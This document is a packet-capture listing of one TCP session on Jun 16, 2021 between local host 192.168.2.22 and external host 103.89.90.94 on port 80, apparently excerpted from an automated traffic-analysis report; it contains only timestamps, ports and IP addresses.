Jun 16, 2021 12:29:40.245140076 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245168924 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245176077 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245210886 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245218992 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245245934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245251894 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245280027 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245281935 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245310068 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245312929 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245340109 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245343924 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245371103 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245373011 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245400906 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245402098 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245429039 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245430946 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245460033 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245460033 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245487928 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245488882 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245517969 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.245517969 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.245548964 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249103069 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249272108 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249316931 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249344110 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249352932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249362946 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249382973 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249387026 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249412060 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249420881 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249440908 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249444962 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249469042 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249478102 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249497890 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249500990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249526978 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249533892 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249555111 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249563932 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249583960 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249592066 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249613047 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249620914 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249640942 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249649048 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249670029 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249679089 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249700069 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249703884 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249727964 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249736071 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249758005 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249761105 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249788046 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249795914 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249820948 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249824047 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249854088 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249859095 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249886036 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249895096 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249917984 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249922037 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249949932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249957085 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.249984026 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.249989986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.250020027 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.256254911 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.261997938 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490525961 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490588903 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490624905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490654945 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490680933 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490706921 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490734100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490751028 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490761995 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490777969 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490781069 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490791082 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490792036 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490818977 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490829945 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490849972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490853071 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490879059 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490881920 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490906954 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490911007 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490936041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490940094 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490966082 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.490967989 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.490997076 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493627071 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493675947 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493712902 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493731976 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493743896 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493745089 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493776083 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493777990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493805885 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493809938 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493837118 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493840933 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493868113 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493871927 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493899107 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493902922 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493928909 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493933916 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493958950 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493963957 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.493990898 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.493993998 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494020939 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494028091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494051933 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494052887 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494083881 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494087934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494113922 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494117975 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494149923 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494730949 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494766951 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494776964 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494800091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494803905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494837999 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494839907 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494872093 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494874001 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494909048 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494910002 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494944096 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.494945049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494977951 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.494978905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495014906 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495014906 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495049000 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495049000 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495083094 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495084047 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495126963 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495134115 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495167971 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495174885 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495203018 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495203018 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495237112 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495239019 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495270014 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495273113 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495306969 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495311022 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495340109 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495342016 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495376110 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495377064 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495409966 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495410919 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495445967 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495446920 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495480061 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495481014 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495516062 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495517015 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495553017 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495553970 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495588064 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495589018 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495623112 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495623112 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495656967 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495656967 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495691061 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495692968 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495724916 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495727062 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495759964 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495762110 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495795012 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495796919 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495825052 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.495829105 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.495857954 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.501346111 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.501391888 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.501425982 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.501519918 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.501544952 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508637905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508677006 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508718014 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508748055 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508778095 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508786917 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508804083 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508810043 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508817911 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508841991 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508843899 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508872032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508879900 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508902073 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508904934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508933067 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508935928 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508963108 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.508968115 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.508992910 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.509000063 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.509022951 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.509025097 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.509057045 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.516014099 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735471010 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735516071 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735563993 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735598087 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735630035 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735656023 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735662937 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735687971 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735692978 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735699892 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735701084 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735733986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735734940 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735768080 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735773087 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735810041 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735810041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735842943 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735847950 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735881090 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735886097 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735919952 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735922098 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735958099 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735959053 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.735991955 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.735994101 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736027956 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736030102 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736059904 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736062050 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736093044 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736093998 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736125946 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736128092 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736156940 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736157894 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736190081 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736191034 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736222982 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736222982 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736253977 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736255884 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736289024 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736290932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736324072 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736324072 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736357927 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736357927 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736391068 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736392021 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736423969 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736423969 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736460924 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736466885 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736499071 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.736505985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.736537933 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739108086 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739190102 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739226103 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739253044 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739283085 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739288092 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739306927 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739310026 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739317894 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739324093 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739358902 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739367008 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739392996 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739397049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739427090 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739437103 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739458084 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739490986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739497900 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739506960 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739531040 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739538908 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739562035 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739562988 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739593983 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739603996 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739624023 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739624023 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739651918 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739662886 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739682913 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.739692926 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.739708900 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.740910053 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760672092 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760716915 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760751963 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760778904 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760804892 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760831118 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760847092 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760859966 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760880947 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760885000 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760890007 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760894060 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760919094 CEST	80	49167	103.89.90.94	192.168.2.22
